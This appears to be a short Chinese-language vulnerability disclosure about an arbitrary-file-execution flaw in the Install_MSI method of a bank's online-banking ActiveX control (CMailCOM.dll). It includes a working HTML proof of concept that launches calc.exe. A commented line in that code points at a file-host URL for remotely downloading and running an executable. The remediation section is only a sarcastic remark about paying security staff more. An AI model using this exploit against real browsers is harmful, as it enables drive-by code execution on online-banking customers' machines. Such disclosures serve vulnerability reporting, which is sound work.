漏洞名称:某商业银行网银伴侣v2.0.0.0.activex任意文件执行漏洞
影响版本:某商业银行网银伴侣v2.0.0.0
验证环境:winxp\win7中文版sp1中文,ie6.0-ie8.0)
问题文件:CMailCOM.dll
问题描述:某商业银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。
中信银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。其中如果“//”注释部分是远程下载ftpfuzz并允许的代码
POC代码:
<html>
<body>
<object classid='clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA' id='target' /></object>
<script>
var str = '';
str = str +'C:\\WINDOWS\\System32\\calc.exe';
//"http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe" ;
target.Install_MSI(str);
</script>
</body>
</html>
漏洞修补方法:你们多发点工资给安全部门的打工仔他们就会努力想办法修复了,尽快吧,那些国外的黑帽黑客也不是吃素的哦